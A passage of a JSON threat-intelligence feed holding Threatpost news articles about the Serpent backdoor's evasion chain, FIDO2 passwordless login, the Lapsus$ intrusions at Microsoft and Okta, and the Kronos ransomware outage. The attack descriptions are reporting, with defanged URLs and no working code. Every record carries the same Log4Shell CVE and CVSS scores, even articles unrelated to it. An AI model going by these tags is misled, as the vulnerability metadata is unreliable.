Network devices will also alert administrators if an infected user attempts to connect to a known C2 address or domain.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-10T13:00:32", "type": "threatpost", "title": "Qakbot Botnet Sprouts Fangs, Injects Malware into Email Threads", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-10T13:00:32", "id": "THREATPOST:5B680BEF3CD53FFB3B871FF7365A4C47", "href": "https://threatpost.com/qakbot-botnet-sprouts-fangs-injects-malware-into-email-threads/178845/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, 
{"lastseen": "2022-03-22T14:28:59", "description": "Researchers have discovered a cyberattack that uses unusual evasion tactics to [backdoor](<https://threatpost.com/fin8-bank-sardonic-backdoor/168982/>) French organizations with a novel malware dubbed Serpent, they said.\n\nA team from Proofpoint observed what they call an \u201cadvanced, targeted threat\u201d that uses email-based lures and malicious files typical of many malware campaigns to deliver its ultimate payload to targets in the French construction, real-estate and government industries.\n\nHowever, between initial contact and payload, the attack uses methods to avoid detection that haven\u2019t been seen before, researchers revealed [in a blog post](<https://www.proofpoint.com/us/blog/threat-insight/serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain>) Monday.\n\nThese include the use of a legitimate software package installer called Chocolatey as an initial payload, equally legitimate Python tools that wouldn\u2019t be flagged in network traffic, and a novel detection bypass technique using a Scheduled Task, they said.\n\n\u201cThe ultimate objectives of the threat actor are presently unknown,\u201d Proofpoint researchers Bryan Campbell, Zachary Abzug, Andrew Northern and Selena Larson acknowledged in the post. \u201cSuccessful compromise would enable a threat actor to conduct a variety of activities, including stealing information, obtaining control of an infected host or installing additional payloads.\u201d\n\n## **Serpent: A Slippery Attack Chain**\n\nThe attack chain begins as many [email-based attacks](<https://threatpost.com/ransomware-phishing-emails-segs/176470/>) do\u2014with an email that appears to be coming from a legitimate source that includes a Microsoft Word document containing malicious macros. 
Various parts of the macro include ASCII art that depicts a snake, giving the [backdoor](<https://threatpost.com/tomiris-backdoor-solarwinds-malware/175091/>) its name, researchers said.\n\nThe macro-laden document purports to have important information related to the \u201cr\u00e8glement g\u00e9n\u00e9ral sur la protection des donn\u00e9es (RGPD),\u201d aka the European Union\u2019s General Data Protection Regulations (GDPR), a law which mandates how companies must report data leaks to the government.\n\nIf macros are enabled, the document executes the document\u2019s macro, which reaches out to an image URL\u2013e.g., https://www.fhccu[.]com/images/ship3[.]jpg\u2013that contains a base64 encoded PowerShell script hidden [using steganography](<https://threatpost.com/steganography-combat/143096/>).\n\nThe PowerShell script first downloads, installs and updates the installer package and repository [script](<https://chocolatey.org/install.ps1>) for Chocolatey, a software management automation tool for Windows that wraps installers, executables, .ZIP files and scripts into compiled packages, researchers said.\n\n\u201cLeveraging Chocolatey as an initial payload may allow the threat actor to bypass threat-detection mechanisms because it is a legitimate software package and would not immediately be identified as malicious,\u201d researchers noted.\n\nThe script then uses Chocolatey to install Python, including the [pip](<https://pypi.org/project/pip/>) Python package installer. This component then installs various dependencies including [PySocks](<https://pypi.org/project/PySocks/>), a Python-based reverse proxy client that enables users to send traffic through SOCKS and HTTP proxy servers, researchers said.\n\nNext, the PowerShell script fetches another image file\u2013e.g. https://www.fhccu[.]com/images/7[.]jpg\u2013which contains a base64 encoded Python script that also is obscured using steganography, they said. 
The PowerShell script saves the Python script as \u201cMicrosoftSecurityUpdate.py\u201d and then creates and executes a .bat file that in turn executes the Python script.\n\nThe attack chain ends with a command to a shortened URL which redirects to the Microsoft Office help website, researchers said. The steganographic images used to hide the scripts are hosted on what appears to be a Jamaican credit-union website, they added.\n\n## **Serpent Backdoor**\n\nOnce successfully installed on a targeted system, the Serpent backdoor periodically pings the \u201corder\u201d server (the first onion[.]pet URL) and expects responses of the form <random integer>\u2013<hostname>\u2013<command>.\n\nIf <hostname> matches the hostname of the infected computer, the infected host runs the command provided by the order server (<command>), researchers said. This could be any Windows command as designated by the attacker, the output of which is then recorded.\n\nNext, Serpent uses PySocks to connect to the command-line Pastebin tool called Termbin, pastes the output to a bin, and receives the bin\u2019s unique URL.\n\nAs its final act, the backdoor sends a request to the \u201canswer\u201d server (a second onion[.]pet URL), including the hostname and bin URL in the header. This allows the attacker to monitor the bin outputs via the \u201canswer\u201d URL and see what the infected host\u2019s response was, researchers observed. 
Once this entire process is complete, Serpent cycles through it indefinitely, they added.\n\n## **Task-Scheduler Evasion Tactic**\n\nIn addition to using steganographic images and the Chocolatey package installer to hide its nefarious activities, the attack also uses what Proofpoint researchers said is a never-before-seen application of signed binary proxy execution using a Scheduled Tasks executable, as \u201can attempt to bypass detection by defensive measures.\u201d\n\nA command that leverages schtasks.exe to create a one-time task to call a portable executable is contained within a Swiper image called ship.jpg after the end of file marker, researchers said.\n\n\u201cIn this case the executable is called calc.exe,\u201d researchers wrote in the post. The trigger for this task is contingent on the creation of a Windows event with EventID of 777, after which the command then creates a dummy event to trigger the task, and deletes the task from the task scheduler as if it never occurred, they said.\n\n\u201cThis peculiar application of tasking logic results in the portable executable being executed as a child process of taskhostsw.exe, which is a signed Windows binary,\u201d researchers said.\n
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-22T14:21:42", "type": "threatpost", "title": "Serpent Backdoor Slithers into Orgs Using Chocolatey Installer", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-22T14:21:42", "id": "THREATPOST:16624FA0DF55AAB9FDB3C14AC91EC9F5", "href": "https://threatpost.com/serpent-backdoor-chocolatey-installer/179027/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-22T15:44:45", "description": "We all hate passwords, but none of us want to make logging into our accounts a hassle with extra time, steps and devices. 
That\u2019s why the Fast Identity Online Alliance (FIDO) published a white paper ([PDF](<https://media.fidoalliance.org/wp-content/uploads/2022/03/How-FIDO-Addresses-a-Full-Range-of-Use-Cases.pdf>)) on Thursday, outlining different use cases for the adoption of their FIDO2 set of specifications.\n\nAt the heart of the matter: proposed WebAuthn changes that will smooth the traditional security-versus-usability trade-off that users face when considering FIDO. While FIDO can deliver better security, users have hoops to jump through, FIDO said, including the need to adopt a security key \u2013 for example, the fobs sold by Yubico \u2013 as an authentication device.\n\nUnfortunately, if you avoid the ruffling of users\u2019 feathers, you keep them in a tepid state of security, according to the paper: \u201cMany relying parties keep their users in a password-only mode, or at best, offer phishable second factors,\u201d according to FIDO.\n\nIt\u2019s proposing the following changes to WebAuthn \u2013 the API that makes it easy for web services and other authentication-requesting entities to integrate strong authentication on security keys or on built-in platform authenticators such as biometric readers \u2013 to improve on the situation:\n\n 1. Turning the user\u2019s existing smartphone into a roaming authenticator, and\n 2. 
Providing better support for authenticator implementations (in particular platform authenticators) that sync FIDO credentials between the user\u2019s devices.\n\n\u201cThis makes FIDO the first authentication technology that can match the ubiquity of passwords, without the inherent risks and phishability,\u201d the paper asserted.\n\n## FIDO History\n\nFIDO, alongside the World Wide Web Consortium (W3C), created FIDO2 to be \u201cthe industry\u2019s answer to the global password problem,\u201d according to its [marketing](<https://fidoalliance.org/fido2/>), addressing \u201call of the issues of traditional authentication.\u201d These specifications \u2013 10 years in the making \u2013 threaten to replace traditional passwords entirely. Yet they \u201chaven\u2019t attained large-scale adoption of FIDO-based authentication in the consumer space,\u201d the paper admitted.\n\nNow is the time for individuals and enterprises to take the proactive step of implementing strong authentication. So will they?\n\nAnd, really, should they? Not everybody thinks so.\n\n## What is FIDO2?\n\nPasswords are the single most tenuous beam propping up our security online. A [tiny minority](<https://threatpost.com/study-only-4-corporate-it-users-stick-password-rules-101509/72326/>) of people follow authentication best practices. Most of us use [bad passwords](<https://threatpost.com/weak-easy-to-remember-passwords-a-familiar-crutch-for-users/100663/>), and then reuse them over and over, [even though we know we shouldn\u2019t](<https://threatpost.com/threatlist-people-know-reusing-passwords-is-dumb-but-still-do-it/155996/>). Then we continue reusing those passwords [even after they\u2019ve been leaked to cybercriminals](<https://threatpost.com/breached-passwords-still-in-use-by-hundreds-of-thousands/147434/>).\n\nSuch was the impetus for the formation of the FIDO alliance. 
Nearly a decade ago, FIDO [made it its mission](<https://threatpost.com/darpa-fido-alliance-join-race-replace-passwords-021213/77518/>) to fight stale, plaintext passwords and create a new, interoperable system of authentication technologies. Since then, the FIDO Alliance has been interested in establishing a standard of interoperable authentication schemes. They could absorb new authentication technologies into a single infrastructure where they can work in concert with existing technologies like USB tokens, one-time passwords and near-field communications (NFC), among others, the thinking went.\n\nThe world\u2019s biggest technology, finance and security companies \u2013 Apple, Meta, Google, PayPal, Wells Fargo, RSA, and on and on \u2013 count themselves among the [alliance](<https://fidoalliance.org/members/>). Many of these companies have implemented \u2013 or even contributed to \u2013 improved authentication security in recent years. Multi-factor authentication (MFA), in particular, has become more common and more robust since the early days of FIDO, when cyberattackers could [nab](<https://threatpost.com/password-cracking-crew-cracks-11m-ashley-madison-passwords/114625/>) [people\u2019s](<https://threatpost.com/easy-passwords-found-rockyou-data-leak-012110/73409/>) [passwords](<https://threatpost.com/gawker-roadkill-how-find-out-and-recover-121310/74769/>) as easily as they could get at phone numbers in the phonebook.\n\nBut \u201cwhile traditional multi-factor authentication (MFA) solutions like SMS one-time codes add another layer of security,\u201d wrote FIDO representatives in 2019, \u201cthey are still vulnerable to phishing attacks, aren\u2019t simple to use and suffer from low opt-in rates.\u201d Hackers can even [bypass the 2FA process entirely](<https://threatpost.com/2fa-broken-authentication/140776/>).\n\nFIDO2 combines [WebAuthn](<https://www.w3.org/TR/2019/REC-webauthn-1-20190304/>) \u2013 in the 
[words](<https://www.w3.org/TR/2019/REC-webauthn-1-20190304/>) of its creators, W3C, \u201can API enabling the creation and use of strong, attested, scoped, public key-based credentials by web applications\u201d \u2013 and FIDO\u2019s client to authenticator protocol ([CTAP](<https://fidoalliance.org/specifications/download/>)), which \u201cenables external devices such as mobile handsets or FIDO security keys to work with browsers supporting WebAuthn, and also to serve as authenticators to desktop applications and web services.\u201d\n\n## Phish-Proofing Authentication\n\nPast all the [technical detail](<https://fidoalliance.org/specifications/download/>), the bottom line is this: By downloading FIDO2 specs, \u201cusers log in with convenient methods such as fingerprint readers, cameras, FIDO security keys, or their personal mobile device,\u201d in a way that \u201celiminates the risks of phishing, all forms of password theft and replay attacks.\u201d That, according to a FIDO [press release](<https://www.w3.org/2019/03/pressrelease-webauthn-rec.html.en>) from 2019.\n\nThe system uses your mobile devices to reduce login theft because, wrote FIDO, \u201ccryptographic login credentials are unique across every website, biometrics or other secrets like passwords never leave the user\u2019s device and are never stored on a server.\u201d And \u201cbecause FIDO keys are unique for each Internet site, they cannot be used to track you across sites.\u201d\n\nEnhanced security, via a device you already have in your pocket, or on your desk. Is this the future?\n\n## Will the Password Finally Die?\n\nExperts across the cybersecurity industry \u2013 not to mention, ordinary people everywhere \u2013 have called for the end of traditional passwords. \u201cMoving to a passwordless experience is an absolute necessity to restore trust and improve security and ease of use,\u201d Jerome Becquart, COO of Axiad, explained to Threatpost via email. 
\u201cWe need a pragmatic approach to passwordless, leveraging both FIDO and PKI,\u201d \u2013 [public key infrastructure](<https://en.wikipedia.org/wiki/Public_key_infrastructure>) \u2013 \u201cin order to address as many use cases as possible, today.\u201d\n\n\u201cMobile phones are the perfect platform to become the all-in-one passwordless authenticator,\u201d he continued, \u201chowever they are not going to be the right answer for every use case. For higher trust requirements, such as privilege accounts, a dedicated, hardware authenticator will still be needed. Additionally there are a number of mobile restricted environments, such as data centers, help desks, manufacturing floors, clean rooms, etc. that may not allow mobile phones to be used. The pragmatic approach is to offer end users multiple authentication form factors, phone, platform bound or dedicated authenticators in order to address this variety of use cases and environments.\u201d\n\nWith newer, stronger methods of authentication, the issue becomes not the technology but its adoption.\n\nHence Thursday\u2019s white paper, which dove into the problem of usability. FIDO concluded its document by claiming that they\u2019ve developed \u201cthe first authentication technology that can match the ubiquity of passwords, without the inherent risks and phishability,\u201d but Becquart believes that \u201cwe are still going to be faced for the foreseeable future with legacy systems and applications that cannot be changed and modified and will still rely on passwords. The only choice for these legacy apps is to use some kind of password vault or SSO products, protected by a FIDO2 credential.\u201d\n\n## How soon can we make the upgrade?\n\nNot all experts agree that we must. \u201cUltimately this is an approach for people with means,\u201d John Bambenek, principal threat hunter at Netenrich, wrote of FIDO2 in an email to Threatpost. 
\u201cMany people lack the resources for FIDO keys or the sophistication to manage new authentication methods with their smartphone.\u201d\n\nPlus, \u201cat a basic level, smartphones can be lost or stolen which means a need for some centralized place to reprovision access. The reality is no technology can be completely trusted.\n\n\u201cPasswords are easy and cheap,\u201d Bambenek concluded, \u201cwhich is why they\u2019ll be around. In the end, people like easy and cheap over complicated and costly.\u201d\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-22T15:42:39", "type": "threatpost", "title": "FIDO: Here\u2019s Another Knife to Help Murder Passwords", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": 
false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-22T15:42:39", "id": "THREATPOST:65DB14FD89BCDBD3391ADD70F1377E70", "href": "https://threatpost.com/fido-knife-murder-passwords/179031/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-23T15:55:24", "description": "In a new blog post published last night, Microsoft confirmed that the Lapsus$ extortion group hacked one of its employee\u2019s accounts to get \u201climited access\u201d to project source code repositories.\n\n\u201cNo customer code or data was involved in the observed activities. Our investigation has found a single account had been compromised, granting limited access. Our cybersecurity response teams quickly engaged to remediate the compromised account and prevent further activity,\u201d Microsoft explained in an [advisory](<https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/>) about the Lapsus$ threat actors.\n\nOver the weekend and into this week, the gang has publicly [claimed](<https://threatpost.com/lapsus-data-kidnappers-claim-snatches-from-microsoft-okta/179041/>) to have penetrated Microsoft\u2019s defenses and stolen source code, including code for the company\u2019s Bing search engine, Bing Maps and Cortana voice assistant.\n\n## Compromised Azure DevOps Server\n\nOn Sunday, the actor announced that it had compromised Microsoft\u2019s Azure DevOps server. 
Lapsus$ [shared](<https://twitter.com/ZeroLogon/status/1505408208059383809?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1505408208059383809%7Ctwgr%5E%7Ctwcon%5Es1_&ref_url=https%3A%2F%2Fsecurityaffairs.co%2Fwordpress%2F129344%2Fcyber-crime%2Flapsus-leak-37gb-microsoft-source-code.html>) a screenshot of what were allegedly Microsoft\u2019s internal source code repositories: leaked files that security researchers [said](<https://www.bleepingcomputer.com/news/microsoft/lapsus-hackers-leak-37gb-of-microsofts-alleged-source-code/>) appear to be legitimate internal source code.\n\n> LAPSU$ next victim seem to be [@Microsoft](<https://twitter.com/Microsoft?ref_src=twsrc%5Etfw>) (?)[@SOSIntel](<https://twitter.com/SOSIntel?ref_src=twsrc%5Etfw>) [@LawrenceAbrams](<https://twitter.com/LawrenceAbrams?ref_src=twsrc%5Etfw>) [pic.twitter.com/X5FmgajJcz](<https://t.co/X5FmgajJcz>)\n> \n> \u2014 \ud83e\udd77\ud83c\udffc\ud83d\udcbbTom Malka\ud83d\udcbb\ud83e\udd77\ud83c\udffc (@ZeroLogon) [March 20, 2022](<https://twitter.com/ZeroLogon/status/1505408208059383809?ref_src=twsrc%5Etfw>)\n\nThe threat actor has published more data since then: On Monday night, \u200b\u200bLapsus$ posted a torrent for a 9GB 7zip archive containing the source code of over 250 projects that the gang claimed came from Microsoft. Then, last night, it released 37GB of that Azure DevOps server-derived data, BleepingComputer [reported](<https://www.bleepingcomputer.com/news/microsoft/lapsus-hackers-leak-37gb-of-microsofts-alleged-source-code/>).\n\nSecurity researchers who have pored over the leaked files told BleepingComputer that they appear to be legitimate internal source code from Microsoft; that the leaked projects contain emails and internal engineering documentation for mobile apps; and that the projects look to be for web-based infrastructure, websites, or mobile apps. 
However, the projects don\u2019t contain source code for Microsoft desktop software such as Windows, Windows Server and Microsoft Office, according to the outlet\u2019s sources.\n\nSecurity Affairs shared a screenshot, shown below, of the uncompressed 7zip archive that contains the 37GB of source code belonging to hundreds of Microsoft projects.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/23104552/Microsoft-data-leak-2-e1648046776282.jpg>)\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/23104557/Microsoft-data-leak-e1648046807438.jpg>)\n\nSource: Security Affairs.\n\nSource code isn\u2019t Medusa. Just looking at it won\u2019t turn anybody into stone. The company \u201cdoes not rely on the secrecy of code as a security measure and viewing source code does not lead to elevation of risk,\u201d Microsoft\u2019s advisory said.\n\n## Lapsus$ TTPs\n\nMicrosoft tracks Lapsus$ as DEV-0537. Its advisory outlines the gang\u2019s tactics, techniques and procedures (TTPs) that it uses to compromise user identities so as to gain initial access to a targeted organization, including:\n\n * Deploying the malicious Redline [password stealer](<https://threatpost.com/various-malware-lurking-in-discord-app-to-target-gamers/163867/>) to obtain passwords and session tokens\n * Purchasing credentials and session tokens from criminal underground forums\n * Paying employees at targeted organizations (or suppliers/business partners) for access to credentials and MFA approval\n * Searching public code repositories for exposed credentials\n\nMicrosoft confirmed that Lapsus$ had used the TTPs in the gang\u2019s attack on Microsoft. \u201cOur team was already investigating the compromised account based on threat intelligence when the actor publicly disclosed their intrusion,\u201d according to its advisory. 
\u201cThis public disclosure escalated our action allowing our team to intervene and interrupt the actor mid-operation, limiting broader impact.\u201d\n\nWith regards to the third bullet point in that TTP list \u2013 paying rogue employees to help it crack a target\u2019s defenses \u2013 Lapsus$ hasn\u2019t been particularly subtle about its recruitment efforts. The gang [posted](<https://cybersecuritynews.com/beware-lapsus-ransomware-group/>) a notice on its Telegram channel on March 10, telling the world that it was up for recruiting company insiders, including those at Microsoft; other big software/gaming companies such as Apple, IBM or EA; telecoms such as Telefonica, ATT; and more, to help it carry out its dirty work.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/23105813/lapsus-recruitment-ad-e1648047507406.png>)\n\nThe Lapsus$ gang\u2019s recruitment ad for rogue employees. Source: Microsoft.\n\n## How to Stop Lapsus$\n\nMicrosoft\u2019s advisory offered a detailed list of recommendations for organizations to help them avoid going through what it, Okta and a growing list of Lapsus$ victims have suffered.\n\nBelow are some of the company\u2019s top-level suggestions. 
Its advisory drills down into each:\n\n * Strengthen MFA implementation\n * Require healthy and trusted endpoints\n * Leverage modern authentication options for VPNs\n * Strengthen and monitor your cloud security posture\n * Improve awareness of social engineering attacks\n * Establish operational security processes in response to DEV-0537 intrusions\n\n## Lapsus$ Got at Data for 2.5% of Okta Customers\n\nLapsus$ also breached authentication firm Okta, it claimed: a claim supported by what the actor purported were screenshots of Okta\u2019s Slack channels and the interface for Cloudflare, which is one of thousands of customers that use Okta\u2019s technology to provide authentication for its employees.\n\nIn an [update](<https://www.okta.com/blog/2022/03/updated-okta-statement-on-lapsus/>) published last night, Okta Chief Security Officer David Bradbury confirmed the hit and provided details on the scope, saying that about 2.5 percent of the company\u2019s customers were potentially affected by a January 2022 Lapsus$ intrusion. Hence, those companies\u2019 data \u201cmay have been viewed or acted upon,\u201d he said. As of Tuesday night, Okta had already contacted affected customers by email.\n
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-23T15:28:03", "type": "threatpost", "title": "Microsoft: Lapsus$ Used Employee Account to Steal Source Code", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-23T15:28:03", "id": "THREATPOST:47481707E9A4BF7FC15CC47EC8A8F249", "href": "https://threatpost.com/microsoft-lapsus-compromised-one-employees-account/179048/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-10T00:00:00", "description": "Remember when Kronos, the workforce-management workhorse, got [whacked](<https://threatpost.com/kronos-ransomware-outage-payroll-chaos/176984/>) by ransomware in 
December, right in time to gum up end-of-year HR busywork such as bonuses and vacation tracking?\n\nCould take days to crawl back, Ultimate Kronos Group (UKG) [said](<https://community.kronos.com/s/feed/0D54M00004wJCdJSAW?language=en_US>) at the time. Or, then again, could take up to several weeks, it said in a subsequent [update](<https://community.kronos.com/s/feed/0D54M00004wJKHiSAO?language=en_US>).\n\nIt turns out that dragging its Kronos Private Cloud (KPC) systems back has taken nearly two months. As of Jan. 22, it wasn\u2019t yet done dragging them back, but aggrieved customers had started the process of dragging the company into court as scheduling and payroll was disrupted at [thousands of employers](<https://www.shrm.org/resourcesandtools/hr-topics/technology/pages/ukg-ransomware-disrupts-scheduling-payroll-kronos-private-cloud.aspx>) \u2013 [including hospitals](<https://www.npr.org/2022/01/15/1072846933/kronos-hack-lawsuits>) \u2013 many of which have been forced to log hours manually.\n\nAs NPR reported on Jan. 15, some 8 million people experienced \u201cadministrative chaos\u201d following the attack, including tens of thousands of public transit workers in the New York City metro area, public service workers in Cleveland, employees of FedEx and Whole Foods, and \u201cmedical workers across the country who were already dealing with an omicron surge that has filled hospitals and exacerbated worker shortages.\u201d\n\n020722 18:31 UPDATE: Sportswear manufacturer Puma was one of two UKG customers whose employees\u2019 personally identifying information (PII) \u2013 including their Social Security Numbers (SSNs) \u2013 was stolen by attackers. See below for more details.\n\n020822 10:55 UPDATE: A UKG spokesperson reached out to Threatpost to clarify that the September Puma breach, which resulted in stolen source code, was unrelated to UKG\u2019s December ransomware attack on Kronos Private Cloud. 
UKG subsequently discovered that Puma was one of two customers who had employee PII compromised as a result of the ransomware attack. Puma was a Kronos Private Cloud customer, and the affected employees and their dependents are in the process of being notified, he said.\n\n## Furious and Filing Suits\n\nAs far as UKG\u2019s gratitude for customers\u2019 patience goes, it might be a little aspirational.\n\nCustomers were already seething over the company\u2019s lack of communication as the weekend unwound following the Saturday, Dec. 11 discovery of the attack. They [complained](<https://community.kronos.com/s/feed/0D54M00004wJKHiSAO?language=en_US>) [about](<https://community.kronos.com/s/feed/0D54M00004wJCdJSAW?language=en_US>) poor communication, a lack of information about whether their data was still out there somewhere, that the company\u2019s portal and support site had gone AWOL right in the thick of things, and that the \u201cweeks\u201d or \u201cdelays\u201d to restore systems was insupportable.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/03172618/Kronos-customers-fuming-e1643927213846.jpg>)\n\nKronos customers\u2019 complaints. 
Source: Kronos Community Forum.\n\nThe subsequent lawsuits include a [class action](<https://www.classaction.org/news/new-york-mta-employees-owed-unpaid-overtime-following-kronos-data-breach-lawsuit-alleges>) filed by New York transit workers claiming that the Metropolitan Transportation Authority has \u201cfailed to pay certain employees any overtime wages since their payroll administrator was crippled by a December 2021 data breach.\u201d\n\nWorkers at Tesla and PepsiCo have also brought separate [lawsuits](<https://searchhrsoftware.techtarget.com/news/252512253/Tesla-PepsiCo-workers-bring-lawsuit-over-UKG-payroll-outage#:~:text=Lawsuits%20over%20the%20ransomware%20attack,inaccurate%20pay%20during%20the%20outage.&text=Two%20workers%2C%20one%20at%20Telsa%20Inc.&text=subsidiary%2C%20are%20suing%20the%20Ultimate,short%20of%20what%20they%20earned.>) over the UKG payroll outage, claiming that they received inaccurate pay during the outage.\n\nAs well, at the end of December, West Virginia\u2019s state auditor, J.B. McCuskey [promised](<https://wvmetronews.com/2021/12/31/mccuskey-promises-lawsuit-against-state-contractor-if-damages-for-payroll-problems-are-left-unpaid/>) that \u201cwe\u2019re going to hold Kronos accountable\u201d for what he called the \u201creal pain in the rear end\u201d of having to manually input information for more than 37,000 state employees before they got their first paychecks of 2022.\n\n020722 17:54 UPDATE: UKG didn\u2019t respond to Threatpost\u2019s inquiries regarding when it expects all of its systems to be fully restored. 
On Thursday evening, a company spokesperson pointed Threatpost to an [FAQ](<https://www.ukg.com/KPCupdates/kpc-faq>) that states that the company is working with Mandiant and West Monroe \u201cto test and continually harden our environment.\u201d\n\nThe company has identified \u201ca relatively small volume of data that was exfiltrated\u201d \u2013 data that included the personal details of two customers\u2019 employees. Both affected customers have been notified, it said.\n\nIn September, The Record [reported](<https://therecord.media/hackers-stole-puma-source-code-no-customer-data-company-says/>) that one of those customers was Puma, the sportswear manufacturer. The attackers stole source code, according to The Record. As of late August, they were trying to extort the company into paying ransom for it, threatening to release the files on a leak site if the German company didn\u2019t pay up.\n\n020822 10:44 UPDATE: The two incidents \u2013 Puma\u2019s September breach and the attack on UKG, which provides services to Puma \u2013 are unrelated, contrary to what Threatpost erroneously reported in an earlier update.\n\nAs [BleepingComputer](<https://www.bleepingcomputer.com/news/security/puma-hit-by-data-breach-after-kronos-ransomware-attack/>) reported on Monday after having dug up breach notification letters filed with several attorneys general\u2019s offices, the [breach notification](<https://apps.web.maine.gov/online/aeviewer/ME/40/10394643-6f4e-49ff-884a-9977602932a9.shtml>) UKG filed with the Office of the Maine Attorney General indicated that personal information belonging to Puma employees and their dependents was involved in the breach.\n\nPuma was one of two customers who had employee PII compromised as a result of that incident. 
Puma was a Kronos Private Cloud customer, and affected employees are in the process of being notified \u2013 hence the filing with the Maine AG\u2019s office.\n\nThat same letter said that data belonging to a total of 6,632 individuals were affected in the UKG breach, including SSNs.\n\n## Customers No Longer Using Pen and Paper\n\nUKG\u2019s core services were restored as of Jan. 22. That leaves \u201ccertain supplementary customer applications\u201d still to be restored. But at this point, customers are no longer using pen and paper for payroll, employee scheduling and other critical functions.\n\n_**Check out our free **_[_**upcoming live and on-demand online town halls**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 